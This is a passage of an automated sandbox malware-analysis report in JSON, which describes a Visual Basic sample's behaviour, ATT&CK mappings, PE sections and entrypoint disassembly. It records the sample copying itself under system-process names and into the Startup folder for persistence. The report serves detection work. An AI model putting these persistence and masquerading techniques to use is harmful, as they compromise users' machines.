\"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005072)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76110000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76110000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76110000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76110000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76110000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76110000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76110000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76110000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005160)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004880)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004596)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005356)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005072)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005152)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004420)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005452)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005364)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003360)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005752)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005544)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005728)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005756)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005716)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005780)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005560)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005524)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005608)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005532)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005644)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004316)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005956)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004192)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004320)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005160)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004880)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004596)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005356)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005072)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005152)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004420)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005452)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005364)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003360)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005752)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005544)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005728)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005756)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005716)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005780)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005560)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005524)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005608)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005532)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005644)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004316)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005956)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004192)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004320)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"D3_08.exe\" (UID: 00000000-00005160) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"D3_08.exe\" (UID: 00000000-00005160) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0\" has an executable section named \".text\"\n \"services.exe\" has an executable section named \".text\"\n \"D3_08.exe\" has an executable section named \".text\"\n \"shell.exe\" has an executable section named \".text\"\n \"IExplorer.exe\" has an executable section named \".text\"\n \"D3_08.exe.bin\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"CSRSS.EXE.bin\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"SMSS.EXE\" has an executable section named \".text\"\n \"D3_08.EXE.67EE5DF0.bin\" has an executable section named \".text\"\n \"MrD3_08.scr\" has an executable section named \".text\"\n \"D3_08.EXE.67EE466A.bin\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE466E.bin\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE5DF3.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0\" has an writable section named \".data\"\n \"services.exe\" has an writable section named \".data\"\n \"D3_08.exe\" has an writable section named \".data\"\n \"shell.exe\" has an writable section named \".data\"\n \"IExplorer.exe\" has an writable section named \".data\"\n \"D3_08.exe.bin\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"CSRSS.EXE.bin\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"SMSS.EXE\" has an writable section named \".data\"\n \"D3_08.EXE.67EE5DF0.bin\" has an writable section named \".data\"\n \"MrD3_08.scr\" has an writable section named \".data\"\n \"D3_08.EXE.67EE466A.bin\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE466E.bin\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE5DF3.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IExplorer.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IExplorer.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE5DF0.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE5DF0.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrD3_08.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrD3_08.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE466A.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE466A.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE466E.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE466E.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE5DF3.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE5DF3.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location C:\\D3_08.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location C:\\D3_08.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.scr to new location %WINDIR%\\D3_08.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.scr to new location C:\\D3_08.exe (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CopyFileA\" to copy C:\\\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005080)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IExplorer.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE5DF0.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrD3_08.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE466A.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE466E.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE5DF3.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"services.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"shell.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IExplorer.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], 